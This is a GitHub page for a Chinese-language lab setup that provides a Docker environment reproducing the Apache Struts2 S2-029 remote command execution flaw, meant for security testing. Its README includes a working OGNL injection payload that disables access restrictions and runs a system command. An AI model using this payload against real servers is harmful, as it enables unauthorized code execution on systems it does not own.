VulApps/s/struts2/s2-029 at master · Silence566/VulApps

History

Name		Name	Last commit message	Last commit date
parent directory ..
Dockerfile		Dockerfile
README.md		README.md
s2-029-1.png		s2-029-1.png

README.md

Struts2 S2-029 漏洞环境

漏洞信息

S2-029 公告

参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

获取环境:

拉取镜像到本地

$ docker pull medicean/vulapps:s_struts2_s2-029

启动环境

$ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029

-p 80:8080 前面的 80 代表物理机的端口，可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

Exp

命令执行

(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

s2-029

s2-029

README.md

Struts2 S2-029 漏洞环境

漏洞信息

获取环境:

使用与利用

Exp

Files

s2-029

Directory actions

More options

Directory actions

More options

Latest commit

History

s2-029

Folders and files

parent directory

README.md

Struts2 S2-029 漏洞环境

漏洞信息

获取环境:

使用与利用

Exp